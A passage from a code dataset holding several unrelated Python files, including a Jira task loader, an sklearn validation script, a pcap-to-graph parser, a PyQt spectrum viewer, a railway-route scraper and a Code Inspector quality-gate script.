_make_task_caption(self, task_json, task_key):\n return u' '.join([\n task_json['markup'],\n task_json['summary'], '(' + task_key + ')'])\n\n def _h5_task_completion(self, args):\n desc = ''\n len_args = len(args['h5_task_desc'])\n if len_args > 0:\n desc = self._replace_realtime_vars('\\n'.join(args['h5_task_desc']))\n if len_args > args['h5_task_desc_len']:\n self.update_issue_desc(args.get('h5_task_key'), desc)\n args.pop('h5_task_key', None)\n args.pop('h5_task_desc', None)\n return desc\n\n def _create_sub_task(self, task_json, args):\n task_json['parent'] = \\\n args.get('h5_task_key') or args.get('h4_task_key')\n task_key = self.create_issue(task_json)\n desc = self._make_task_caption(task_json, task_key)\n if 'h5_task_key' in args:\n args['h5_task_desc'].append(desc)\n return [desc]\n\n def _create_h5_task(self, task_json, args):\n if 'h5_task_key' in 
args: # if new h5 task begins\n self._h5_task_completion(args)\n key = self.create_issue(task_json)\n args['h5_task_key'] = key\n args['h5_task_desc'] = []\n if 'description' in task_json:\n args['h5_task_desc'].append(task_json['description'])\n args['h5_task_desc_len'] = len(args['h5_task_desc'])\n if args.get('h4_task_key') is not None:\n self.create_link(args.get('h4_task_key'), key)\n desc = [self._make_task_caption(task_json, key)]\n desc.extend(args['h5_task_desc'])\n return desc\n\n def _attach_existing_h5_task(self, task_json, args):\n if 'h5_task_key' in args: # if new h5 task begins\n self._h5_task_completion(args)\n key = task_json['issue_key']\n args['h5_task_key'] = key\n if 'h4_task_key' in args:\n self.create_link(args['h4_task_key'], key)\n args['h5_task_desc'] = [task_json['description']] \\\n if 'description' in task_json else []\n args['h5_task_desc_len'] = len(args['h5_task_desc'])\n desc = [u' '.join((task_json['markup'], key))]\n desc.extend(args['h5_task_desc'])\n return desc\n\n def _create_h4_task(self, task_json, args):\n args['h4_task_key'] = self.create_issue(task_json)\n return [self._make_task_caption(task_json, args['h4_task_key'])]\n\n def _attach_h4_task(self, task_json, args):\n args['h4_task_key'] = task_json['issue_key']\n return [u'.. ' + task_json['issue_key']]\n\n# end of create_tasks() helpers\n# ###################################################################################\n\n def create_issue(self, issue):\n if ('description' in issue) and self.rt_vars:\n issue['description'] = \\\n self._replace_realtime_vars(issue['description'])\n issue_id = self._create_issue_http(issue)\n if 'rt_ext' in issue:\n self._add_runtime_variable(issue['rt_ext'], issue_id)\n if 'link' in issue:\n self._add_link_info(issue_id, issue['link'])\n return issue_id\n\n def _add_link_info(self, issue_id, link_pattern):\n m = re.match('([A-Z]+-\\d+|\\$\\w+)\\|(.+)', link_pattern)\n if m:\n self.links.append({'inward': m.group(1),\n 'type': m.group(2),\n 'outward': issue_id})\n m = re.match('(.+)\\|([A-Z]+-\\d+|\\$\\w+)', link_pattern)\n if m:\n self.links.append({'inward': issue_id,\n 'type': m.group(1),\n 'outward': m.group(2)})\n m = re.match('^([A-Z]+-\\d+|\\$\\w+)$', link_pattern)\n if m:\n self.links.append({'inward': issue_id,\n 'type': 'Relates',\n 'outward': m.group(1)})\n # TODO: check if there is no match\n\n def _add_runtime_variable(self, name, value):\n self.rt_vars.update({name: value})\n self.rt_vars_regex = \\\n re.compile(\"\\$(\" + \"|\".join(map(re.escape,\n sorted(self.rt_vars.keys(), reverse=True))) + \")\")\n\n def _replace_realtime_vars(self, desc):\n return self.rt_vars_regex.sub(\n lambda match: self.rt_vars[match.group(1)], desc) \\\n if self.rt_vars else desc\n\n def _create_issue_http(self, issue):\n \"\"\"\n Invoke JIRA HTTP API to create issue\n \"\"\"\n\n if not self.dry_run:\n try:\n jira_issue = self.jira.create_issue(\n fields=self.jira_format(issue))\n if 'watchers' in issue:\n for w in issue['watchers']:\n self.jira.add_watcher(jira_issue, w)\n return jira_issue.key\n except JIRAError as e:\n error_message = (\"Can't create task in the line {0} of your \"\n \"template.\\nJIRA error: {1}\").\\\n format(issue['line_number'], e.text)\n raise TaskExtractorJiraValidationError(error_message)\n else:\n return 'DRYRUN-1234'\n\n def create_link(self, inward_issue, outward_issue, link_type='Relates'):\n \"\"\"Creates an issue link between two issues.\n\n The specified link type in the request is used to create the link\n and will create a link 
from the inward_issue to the outward_issue.\n The list of issue types can be retrieved using rest/api/2/issueLinkType\n \"\"\"\n\n if not self.dry_run:\n issue1 = self.jira.issue(inward_issue)\n issue2 = self.jira.issue(outward_issue)\n self.jira.create_issue_link(link_type, issue1, issue2)\n else:\n return 'dry run'\n\n def update_issue_desc(self, issue_key, issue_desc):\n if not self.dry_run:\n self.jira.issue(issue_key).update(\n description=issue_desc)\n else:\n return 'dry run'\n","sub_path":"jirabulkloader/task_extractor.py","file_name":"task_extractor.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"582285992","text":"from sklearn.externals import joblib\nfrom sklearn import preprocessing\nfrom scipy.stats import spearmanr\nimport numpy as np\nimport pandas as pd\nimport os\n\n\n# load different models\nmodel_list = os.listdir(\"..//..//02_drug_model//prot_model//\")\nmodel_list = sorted(model_list)\n\n\ncounter = 1\nfor model in model_list:\n print(counter)\n validation_drug_prot = model.replace(\"_model_MACCS_properties\", \"\")\n\n # load drug info data (for standardization)\n all_df = pd.read_csv(\"..//..//01_raw_data//05_all_drug_info.txt\", sep=\"\\t\", header=None, lineterminator=\"\\n\")\n all_properties = np.array(list(all_df[all_df.columns[-1]].apply(lambda x: x[1:-1].replace(\"[\", \"\").replace(\"]\", \"\").split(\",\"))))\n scaler = preprocessing.StandardScaler().fit(all_properties)\n\n # load drugs\n df = pd.read_csv(\"..//..//02_drug_model//drug_per_prot//\" + validation_drug_prot + \".txt\", sep=\"\\t\", header=None, lineterminator=\"\\n\")\n MACCS = np.array(list(df[df.columns[-2]].apply(lambda x: x[1:-1].replace(\"[\", \"\").replace(\"]\", \"\").split(\",\"))))\n properties = np.array(list(df[df.columns[-1]].apply(lambda x: x[1:-1].replace(\"[\", \"\").replace(\"]\", \"\").split(\",\"))))\n Ki = np.array(list(df[df.columns[3]]))\n\n # data standardization\n properties = scaler.transform(properties)\n MACCS_properties = np.array(np.append(MACCS, properties, axis=1))\n\n x_test = MACCS_properties\n y_test = Ki\n\n # use different models except validation_model\n validation_predict = []\n\n with open(\".//result//predicted_\" + validation_drug_prot + \"_drugs_w_all_model_scc.txt\", \"w\") as o1:\n print(\"drug numbers =\", len(y_test), file=o1)\n print(\"Prot_model_compared\", \"SCC_of_predicted_ki\", \"p_value\", sep=\"\\t\", file=o1)\n\n SVR_linear = joblib.load(\"..//..//02_drug_model//prot_model//\" + model)\n result = SVR_linear.predict(x_test)\n validation_predict = list(result)\n\n for other_model in model_list:\n if validation_drug_prot in other_model:\n pass\n else:\n SVR_linear = joblib.load(\"..//..//02_drug_model//prot_model//\" + other_model)\n result = SVR_linear.predict(x_test)\n y_pred = list(result)\n scc, pval = spearmanr(validation_predict, y_pred)\n print(other_model.replace(\"_model_MACCS_properties\", \"\"), scc, pval, sep=\"\\t\", file=o1)\n\n counter += 1\n","sub_path":"03_val_predict_drug_betw_model/01_drug_validation.py","file_name":"01_drug_validation.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"275284856","text":"import dpkt \nfrom dpkt.compat import compat_ord\nimport os, sys\nimport socket\nimport binascii\nimport json\n\n\nfile = open('20110413_pcap_1.pcap', 'rb')\n#ip:mac\noutput_string = \"edges: [\"\n\nbinetflow = {}\nip_macs = 
{}\npackets = dpkt.pcap.Reader(file)\n\ndef mac_addr(address):\n    return ':'.join('%02x' % compat_ord(b) for b in address)\n\nfor ts, buf in packets:\n\n    eth = dpkt.ethernet.Ethernet(buf)\n    if isinstance(eth.data, dpkt.ip.IP):\n        ip = eth.data\n        src = socket.inet_ntoa(ip.src)\n        dst = socket.inet_ntoa(ip.dst)\n        mac = mac_addr(eth.src)\n        ip_macs[src] = mac  # record the source IP -> MAC mapping for the JSON dump below\n        \n        output_string += '{ source: {id: ' + src + ', label: \"' + src + '\"}, target: {id: ' + dst + ', label: \"'+dst+'\"},value: \"Test\" },'\n        \n\noutput_string += \"]}\"\nprint(json.dumps(ip_macs))\noutput = open(\"vis\", \"w\")\noutput.write(output_string)\noutput.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"74207724","text":"def power(value, ipow):\n    result = 1\n    while (ipow > 0):\n        if ipow % 2 == 1:\n            result *= value\n        value *= value\n        ipow //= 2  # floor division keeps ipow an int; '/=' would drift into floats and break the parity test\n    return result\n\na = int(input())\np = int(input())\nprint(power(a, p))\n\n","sub_path":"Week7_Множества_и_словари_Sets_and_Dictionaries/Power.py","file_name":"Power.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"618379439","text":"# with open(\"test_input.txt\", \"r\") as f:\n# with open(\"test_input2.txt\", \"r\") as f:\nwith open(\"input.txt\", \"r\") as f:\n    f = f.read().splitlines()\n\ntarget = 30000000\nstart = list(map(int, f[0].split(\",\")))\n\nlast = {v: i+1 for i, v in enumerate(start)}\n\ncurrent = 0\n\nfor i in range(len(start)):\n    print(i, start[i])\n\nfor i in range(len(start)+1, target):\n    # print(i, current)\n    if current in last:\n        new_current = i - last[current]\n        last[current] = i\n        current = new_current\n    else:\n        last[current] = i\n        current = 0\n\nprint(current)\n\n","sub_path":"15/solution_2.py","file_name":"solution_2.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"105340730","text":"\nfrom __future__ import unicode_literals\nimport sys\nimport os\nimport random\nimport time\n\nimport numpy as np\nfrom numpy import arange, sin, pi\n\nimport scipy\nimport scipy.signal\n\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\nimport als_methods as als\nimport pre as crikit\n\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QInputDialog, QPushButton, QMainWindow, QApplication, QSpinBox, QLabel, QMessageBox\nfrom PyQt5.QtWidgets import QWidget, QAction, QTabWidget,QVBoxLayout, QHBoxLayout\nfrom PyQt5.QtWidgets import QGroupBox, QDialog,QGridLayout\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLineEdit, QFileDialog\n \nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\n\nimport matplotlib\n# Make sure that we are using Qt5\nmatplotlib.use('Qt5Agg')\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n### homemade package\n\nfrom Cars_Class import CARS, KK_ALS_Spectral\n\nprogname = os.path.basename(sys.argv[0])\nprogversion = \"0.1\"\n\n\n\nclass App(QMainWindow):\n    \n    def __init__(self):\n        super().__init__()\n        self.title = 'PyQt5 tabs - pythonspot.com'\n        self.left = 0\n        self.top = 0\n        self.width = 1000\n        self.height = 800\n        
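# apply the window title and geometry configured above\n        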
self.setWindowTitle(self.title)\n        self.setGeometry(self.left, self.top, self.width, self.height)\n        \n        self.table_widget = MyTableWidget(self) # create a Widget.\n        self.setCentralWidget(self.table_widget) # set the Widget to be the CentralWidget of the QMainWindow.\n        \n        self.show()\n\nclass MyTableWidget(QWidget):    \n    \n    def __init__(self, parent):    \n        super(QWidget, self).__init__(parent)\n\n        self.fileName = ''\n\n        \n        self.layout = QVBoxLayout(self) # create a Layout, which will be set on self\n\n        # Initialize tab screen\n        self.tabs = QTabWidget()\n        self.tab1 = QWidget()    \n        self.tab2 = QWidget()\n        #self.tabs.resize(800,600)  \n        \n        self.tabs.addTab(self.tab1,\"Tab 1\") # Add tabs\n        self.tabs.addTab(self.tab2,\"Tab 2\")\n        \n        self.layout.addWidget(self.tabs) # Add tabs to widget\n\n        self.setLayout(self.layout)\n\n        self.initialUI_tab_1()\n        self.initialUI_tab_2()\n\n    def initialUI_tab_1(self):\n        #################### Create Plot canvas widget ###################################################\n        # Create first tab\n        self.tab1_layout = QHBoxLayout(self) # create a Layout, which will be set on tab_1\n\n        self.tab1_layout_L = QVBoxLayout(self)\n\n        self.button_openBackgroundfile = QPushButton('Open Background File') # button wired to openFileNameDialog\n        self.button_openBackgroundfile.clicked.connect(self.openFileNameDialog)   \n        self.button_openSignalfile = QPushButton('Open Signal File') # button wired to openFileNameDialog\n        self.button_openSignalfile.clicked.connect(self.openFileNameDialog)   \n        \n        self.tab1_layout_L.addWidget(self.button_openBackgroundfile)\n        self.tab1_layout_L.addWidget(self.button_openSignalfile)\n\n        self.tab1_layout_R = QVBoxLayout(self)\n\n        self.plotUp = plt.figure(\"Background\")\n\n        axes_Up = self.plotUp.add_subplot(111)\n\n        self.add_plotfigure(self.plotUp, self.tab1_layout_R)\n        \n        self.buttonPlotUp = QPushButton('Plot') # Just some button connected to `plot` method   \n        self.buttonPlotUp.clicked.connect(self.test_fun(axes_Up, \"background\"))\n        self.tab1_layout_R.addWidget(self.buttonPlotUp)\n\n        self.plotDown = plt.figure(\"Signal\")\n        axes_Down = self.plotDown.add_subplot(111)\n\n        self.add_plotfigure(self.plotDown, self.tab1_layout_R)\n        \n        self.buttonPlotDown = QPushButton('Plot') # Just some button connected to `plot` method    \n        self.buttonPlotDown.clicked.connect(self.test_fun(axes_Down, \"signal\"))   \n        self.tab1_layout_R.addWidget(self.buttonPlotDown)\n\n\n        self.tab1_layout.addLayout(self.tab1_layout_L)\n        #self.tab1_layout.addStretch()\n        self.tab1_layout.addLayout(self.tab1_layout_R)\n\n        self.tab1.setLayout(self.tab1_layout) # set tab1_layout to be the layout of tab_1   \n\n    def initialUI_tab_2(self):\n        #################### Create Plot canvas widget ###################################################\n        # Create second tab\n        self.tab2_layout = QVBoxLayout(self) # create a Layout, which will be set on tab_2\n\n\n        self.tab2PlotUp = plt.figure(\"Background and Signal\")\n        self.add_plotfigure(self.tab2PlotUp, self.tab2_layout)\n        tab2Axes_Up = self.tab2PlotUp.add_subplot(111)\n\n        self.tab2buttonPlotUp = QPushButton('Plot Back + Signal') # Just some button connected to `plot` method   \n        self.tab2buttonPlotUp.clicked.connect(self.test_fun(tab2Axes_Up, \"Background and Signal\"))\n\n\n        self.button_CARS2SPET = QPushButton('CARS --> SPET') # button wired to CARS2SPET\n        self.button_CARS2SPET.clicked.connect(self.CARS2SPET)    \n        \n        self.tab2_layout.addWidget(self.tab2buttonPlotUp)\n        self.tab2_layout.addWidget(self.button_CARS2SPET)\n\n\n        
self.tab2.setLayout(self.tab2_layout) # set tab2_layout to be the layout of tab_2  \n\n    def openFileNameDialog(self):    \n        options = QFileDialog.Options()\n        options |= QFileDialog.DontUseNativeDialog\n        self.fileName, _ = QFileDialog.getOpenFileName(self,\"QFileDialog.getOpenFileName()\", \"\",\"All Files (*);;Python Files (*.py)\", options=options)\n        if self.fileName:\n            print(self.fileName)\n        \n\n    def test_fun(self, axes, dataName):\n\n        def inner_test_fun():\n            \n            print(\"dataName\", dataName)\n\n            # save the background data and signal data, which will be used to get the spectrum.\n            if dataName == \"background\" or dataName == \"signal\":\n                ## read the file that was just opened\n                self.readfile()\n\n                if dataName == \"background\":\n                    #print(\"background\")\n                    self.background = self.dicDataNorm[\"averageIntensity\"]\n                    #print(self.background)\n                elif dataName == \"signal\":\n                    #print(\"signal\")\n                    self.signal = self.dicDataNorm[\"averageIntensity\"]\n                    #print(self.signal)\n\n                for key, value in self.dicDataNorm.items():\n                    if (key != \"wavenumber\" and key != \"wavelength\"):\n                        print(key)\n                        axes.plot(self.WN, value, label = key)\n\n            elif dataName == \"Background and Signal\":\n\n                axes.plot(self.WN, self.signal, label = \"signal\")\n                axes.plot(self.WN, self.background, label = \"background\")\n\n                pass\n            \n            \n            axes.legend()\n            axes.set_xlabel('Wavenumber (cm$^{-1}$)')\n            axes.set_ylabel('Spectrum (au)')\n\n        return inner_test_fun\n\n    def CARS2SPET(self):\n\n        self.finalPlot = plt.figure(\"CARS2SPET\")\n\n        self.finalAxes = self.finalPlot.add_subplot(111)\n        self.finalAxes.plot(self.background)\n\n        #self.finalAxes.figure.canvas.draw()\n        #plt.draw()\n\n        #print(self.background)\n        #print(self.signal)\n\n    \n    def readfile(self):\n        ## read the data \n        app = CARS()\n        self.dicData, self.dicDataNorm = app.loadData(self.fileName)\n\n        self.WN = self.dicDataNorm[\"wavenumber\"]\n        averageIntensity = 0.0 * self.dicDataNorm[\"wavenumber\"]\n\n        ## then plot the data\n        for key, value in self.dicDataNorm.items():\n            if (key != \"wavenumber\" and key != \"wavelength\"):\n                averageIntensity += value\n        \n        # there are two lists that are not intensity data:\n        # dicDataNorm[\"wavenumber\"] and dicDataNorm[\"wavelength\"]\n        # add the \"averageIntensity\" to dicDataNorm, which will be used to calculate the spectrum\n        self.dicDataNorm[\"averageIntensity\"] = averageIntensity/(len(self.dicDataNorm) - 2)\n        #print(\"averageIntensity is \", self.dicDataNorm[\"averageIntensity\"])\n\n\n        #dicSignal, dicSignalNorm = app.loadData('spectra_signal.xlsx')\n        #return dicBackground, dicBackgroundNorm\n    \n    \n    def showdialog(self):\n        msg = QMessageBox()\n        msg.setIcon(QMessageBox.Information)\n\n        msg.setText(\"This is a message box\")\n        msg.setInformativeText(\"This is additional information\")\n        msg.setWindowTitle(\"MessageBox demo\")\n        msg.setDetailedText(\"The details are as follows:\")\n        msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n\n\n    def add_plotfigure(self, figureName, plot_layout):\n        #self.figureName = plt.figure() # a figure instance to plot on\n        #putting \"plt.ion\" at the top would make two extra figures appear independently.\n\n        # this is the Canvas Widget that displays the `figure`, it takes the `figure` instance as a parameter to __init__\n        canvas_figureName = FigureCanvas(figureName)\n        toolbar_figureName = NavigationToolbar(canvas_figureName, self) # this is the Navigation widget, it takes the Canvas widget and a parent\n        \n        plot_layout.addWidget(toolbar_figureName) # this is also needed to show the Navigation of the plot\n        
plot_layout.addWidget(canvas_figureName) # add the Canvas Widget (plot widget) onto the given layout\n\n    def plotFigure(self):\n        app = CARS()\n        app.plotPredata(self.dicBackground, self.plotUp)\n\n\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    ex = App()\n    print(\"the last step!\")\n    sys.exit(app.exec_())\n\n","sub_path":"qt_test.py","file_name":"qt_test.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"185858260","text":"\"\"\"Storing data\r\n    json.dump(): stores data; it takes two arguments: the data to store and a file object to write the data to.\r\n    json.load()\r\n\"\"\"\r\nimport json\r\nfilename = 'favorite_number.json'\r\n\r\n\r\ndef new_f_number():\r\n    try:\r\n        username = input(\"Hello. What is your name?\")\r\n        number_input = input(\"What is your favorite number?\")\r\n        f_number = int(number_input)\r\n        favorite_number = {username: f_number}\r\n        with open(filename, 'w') as f_number_obj:  # 'w' keeps the file a single JSON object\r\n            json.dump(favorite_number, f_number_obj)\r\n        return favorite_number\r\n    except ValueError:\r\n        print(\"What you entered is not a number!\")\r\n\r\n\r\ndef get_f_number():\r\n    try:\r\n        with open(filename) as f_number_obj:\r\n            data = json.load(f_number_obj)\r\n    except FileNotFoundError:\r\n        return new_f_number()\r\n    else:\r\n        return data\r\n\r\n\r\ndef greet_user():\r\n    name = input(\"What is your name?\")\r\n    flag = True\r\n    for username in get_f_number().keys():\r\n        if username == name:\r\n            print(username + \", I know your favorite number is \" + str(get_f_number()[username]))\r\n            flag = False\r\n            break\r\n    if flag:\r\n        print(\"You are new here.\")\r\n\r\n\r\ndef main():\r\n    greet_user()\r\n    pass\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()","sub_path":"python_work/chapter_10/practice_10.5.py","file_name":"practice_10.5.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"317306810","text":"'''\nCreated on Feb 5, 2015\n\n@author: Asif\n'''\n\nfrom selenium import webdriver\n#from selenium.webdriver.common.keys import Keys\n#from bs4 import BeautifulSoup\n#import re\n#All the required libraries are imported\n\n#Using PhantomJS, which does not open a browser window and can save a great deal of time\ndriver = webdriver.PhantomJS(\"C:\\\\Users\\\\Asif\\\\Desktop\\\\phantomjs-2.0.0-windows\\\\bin\\\\phantomjs.exe\")\n\ndef go(stn1,stn2):\n    #Prepare the Selenium to handle alerts\n    \n    #Removing the redundant characters in the output\n    #regex = re.compile(r'[\\r\\n\\t\\\\n\\\\t]')\n\n    #Get the Driver Class\n    driver.get(\"http://rbs.indianrail.gov.in/ShortPath/ShortPath.jsp\")\n\n    #Fill the Source and Destination entries\n    element = driver.find_element_by_name(\"srcCode\")\n    element.send_keys(stn1)\n    element = driver.find_element_by_name(\"destCode\")\n    element.send_keys(stn2)\n\n    #Submit the form\n    driver.find_element_by_name(\"findPath0\").click()\n\n    #Get the total number of links\n    #total_links = len(re.findall('
is done (in secs). Default to 600.\nExample:\n $ code-inspector-check-quality -p \"MY SUPER PROJECT\" --min-quality-score 90\n\"\"\"\n\nimport os\nimport json\nimport logging\nimport sys\nimport time\n\nimport docopt\nfrom code_inspector.common import is_grade_lower\nfrom code_inspector.constants import DEFAULT_TIMEOUT\n\nfrom .graphql.common import do_graphql_query\nfrom .version import __version__\n\nlogging.basicConfig()\n\nlog = logging.getLogger('code-inspector')\n\n\ndef start_analysis(access_key, secret_key, token, actor, repository, sha, ref, project_name):\n \"\"\"\n Get the project information with the latest analysis data using the project name\n :param access_key: the access key to the GraphQL API\n :param secret_key: the secret key to the GraphQL API\n :param token: the token to use to analyze the project (used to checkout the repository).\n :param actor: GitHub username that initiated the request\n :param repository: GitHub repository name.\n :param sha: SHA to analyze\n :param ref: ref to analyze (branch or tag)\n :param project_name: name of the project\n :return: the project identifier or None is exception or non-existent project.\n \"\"\"\n args = []\n if project_name is not None and len(project_name) > 0:\n args.append(\"projectName: \\\"\" + project_name + \"\\\"\")\n if ref is not None and len(ref) > 0:\n args.append(\"ref: \\\"\" + ref + \"\\\"\")\n args.append(\"token: \\\"\" + token + \"\\\"\")\n args.append(\"actor: \\\"\" + actor + \"\\\"\")\n args.append(\"repositoryName: \\\"\" + repository + \"\\\"\")\n args.append(\"sha: \\\"\" + sha + \"\\\"\")\n args_string = \",\".join(args)\n query = \"\"\"mutation {githubAction(\"\"\" + args_string + \"\"\"){id}}\"\"\"\n response_json = do_graphql_query(access_key, secret_key, {\"query\": query})\n\n if not response_json:\n return None\n\n return response_json['githubAction']\n\n\ndef get_analysis_by_revision(access_key, secret_key, project_name, revision):\n \"\"\"\n Get an analysis using its ID\n :param access_key: access key to poll the API\n :param secret_key: secret key to poll the API\n :param project_name: name of the project to analyze\n :param revision: the revision to analyze\n :return: the return code depending on the results or some processing error\n \"\"\"\n\n query = \"\"\"\n {\n project(name: \\\"\"\"\" + project_name + \"\"\"\\\") {\n analyses(revision: \\\"\"\"\" + revision + \"\"\"\\\", howmany: 1, skip: 0) {\n id\n status\n slocs\n techdebt{\n grade\n score\n }\n summary{\n duplicates\n violations\n duplicated_lines\n longFunctions\n totalFunctions\n complexFunctions\n }\n }\n }\n }\n \"\"\"\n response_json = do_graphql_query(access_key, secret_key, {\"query\": query})\n logging.info(\"Analysis response %s\", response_json)\n return response_json['project']\n\n\ndef main(argv=None):\n \"\"\"\n Main function that makes the magic happen.\n :param argv:\n :return:\n \"\"\"\n options = docopt.docopt(__doc__, argv=argv, version=__version__)\n sha = options['--sha']\n project_name = options['--project']\n min_quality_score_argument = options['--min-quality-score']\n min_quality_grade_argument = options['--min-quality-grade']\n max_defects_rate_argument = options['--max-defects-rate']\n max_complex_functions_rate_argument = options['--max-complex-functions-rate']\n max_long_functions_rate_argument = options['--max-long-functions-rate']\n custom_timeout_sec = options['--max-timeout-sec']\n\n try:\n timeout = int(custom_timeout_sec) if custom_timeout_sec is not None else DEFAULT_TIMEOUT\n except ValueError:\n 
timeout = DEFAULT_TIMEOUT\n\n if timeout == 0:\n timeout = DEFAULT_TIMEOUT\n\n log.addHandler(logging.StreamHandler())\n\n log.setLevel(logging.INFO)\n\n log.info(\"Invoking code-inspector-check-quality with the following parameters\")\n log.info(\" (parameters) \")\n log.info(\"sha: %s\", sha)\n log.info(\"project_name: %s\", project_name)\n log.info(\"min_quality_score_argument: %s\", min_quality_score_argument)\n log.info(\"min_quality_grade_argument: %s\", min_quality_grade_argument)\n log.info(\"max_defects_rate_argument: %s\", max_defects_rate_argument)\n log.info(\"max_complex_functions_rate_argument: %s\", max_complex_functions_rate_argument)\n log.info(\"max_long_functions_rate_argument: %s\", max_long_functions_rate_argument)\n log.info(\"custom_timeout_sec: %s\", custom_timeout_sec)\n log.info(\" (starting) \")\n\n try:\n access_key = os.environ.get('CODE_INSPECTOR_ACCESS_KEY')\n secret_key = os.environ.get('CODE_INSPECTOR_SECRET_KEY')\n\n if not access_key:\n log.info('CODE_INSPECTOR_ACCESS_KEY environment variable not defined!')\n sys.exit(1)\n\n if not secret_key:\n log.info('CODE_INSPECTOR_SECRET_KEY not defined!')\n sys.exit(1)\n\n if not project_name:\n log.info('Project name not defined')\n sys.exit(1)\n\n if not sha:\n log.info('GitHub SHA required')\n sys.exit(1)\n\n # Filter argument and bad values.\n if min_quality_score_argument is not None:\n min_quality_score = int(min_quality_score_argument)\n else:\n min_quality_score = None\n\n if max_defects_rate_argument is not None:\n max_defects_rate = float(max_defects_rate_argument)\n else:\n max_defects_rate = None\n\n if max_complex_functions_rate_argument is not None:\n max_complex_functions_rate = float(max_complex_functions_rate_argument)\n else:\n max_complex_functions_rate = None\n\n if max_long_functions_rate_argument is not None:\n max_long_functions_rate = float(max_long_functions_rate_argument)\n else:\n max_long_functions_rate = None\n\n deadline = time.time() + timeout\n\n while True:\n now = time.time()\n if now > deadline:\n log.error(\"Deadline expired\")\n sys.exit(1)\n\n poll_analysis = None\n project = get_analysis_by_revision(access_key, secret_key, project_name, sha)\n analysis_complete = False\n if project['analyses'] and len(project['analyses']) > 0:\n poll_analysis = project['analyses'][0]\n status = poll_analysis['status']\n if status.upper() in [\"DONE\", \"ERROR\", \"SAME_REVISION\"]:\n poll_analysis = project['analyses'][0]\n analysis_complete = True\n if not analysis_complete:\n log.debug(\"analysis not completed yet\")\n time.sleep(5)\n continue\n\n print(json.dumps(poll_analysis, indent=4))\n\n analysis_slocs = int(poll_analysis['slocs'])\n analysis_violations = int(poll_analysis['summary']['violations'])\n analysis_complex_functions = int(poll_analysis['summary']['complexFunctions'])\n analysis_long_functions = int(poll_analysis['summary']['longFunctions'])\n analysis_total_functions = int(poll_analysis['summary']['totalFunctions'])\n analysis_score = poll_analysis['techdebt']['score']\n analysis_grade = poll_analysis['techdebt']['grade']\n\n if analysis_slocs > 0:\n if analysis_total_functions > 0:\n analysis_complex_function_rate = analysis_complex_functions / analysis_total_functions\n analysis_long_function_rate = analysis_long_functions / analysis_total_functions\n else:\n analysis_complex_function_rate = 0\n analysis_long_function_rate = 0\n\n analysis_violations_rate = analysis_violations / analysis_slocs\n else:\n analysis_complex_function_rate = 0\n analysis_long_function_rate = 0\n 
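# with no analyzed slocs the violation rate also defaults to zero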
analysis_violations_rate = 0\n\n logging.info(\"analysis_score: %s\", analysis_score)\n logging.info(\"analysis_grade: %s\", analysis_grade)\n logging.info(\"analysis_violations_rate: %s\", analysis_violations_rate)\n logging.info(\"analysis_complex_function_rate: %s\", analysis_complex_function_rate)\n logging.info(\"analysis_long_function_rate: %s\", analysis_long_function_rate)\n\n if analysis_score and min_quality_score is not None and analysis_score < min_quality_score:\n log.info(\"analysis score %s is lower than minimum expected score %s\", analysis_score, min_quality_score)\n sys.exit(1)\n\n if max_complex_functions_rate is not None and analysis_complex_function_rate > max_complex_functions_rate:\n log.info(\"complex function rate %s is higher than maximum %s\", analysis_complex_function_rate, max_complex_functions_rate)\n sys.exit(1)\n\n if max_long_functions_rate is not None and analysis_long_function_rate > max_long_functions_rate:\n log.info(\"long function rate %s is higher than maximum %s\", analysis_long_function_rate, max_long_functions_rate)\n sys.exit(1)\n\n if max_defects_rate is not None and analysis_violations_rate > max_defects_rate:\n log.info(\"violation rate %s is higher than maximum %s\", analysis_violations_rate, max_defects_rate)\n sys.exit(1)\n\n if min_quality_grade_argument is not None and is_grade_lower(analysis_grade, min_quality_grade_argument):\n log.info(\"grade %s is lower than grade %s\", analysis_grade, min_quality_grade_argument)\n sys.exit(1)\n\n log.info(\"Everything is fine, all conditions passed\")\n sys.exit(0)\n\n sys.exit(0)\n except KeyboardInterrupt: # pragma: no cover\n log.info('Aborted')\n sys.exit(1)\n sys.exit(0)\n","sub_path":"code_inspector/check_quality.py","file_name":"check_quality.py","file_ext":"py","file_size_in_byte":11070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"311884213","text":"from . import apply\nfrom .forms import DeviceForm, ConfirmForm, ApplicationTable, DeviceTable # ChoiceObj\nfrom flask import render_template, flash # session\nfrom flask_login import login_required, current_user\n# from ..decorators import admin_required\nfrom ..models import Device, User, user_device, ApplicationLog\nfrom ..email import send_email\nfrom .. 
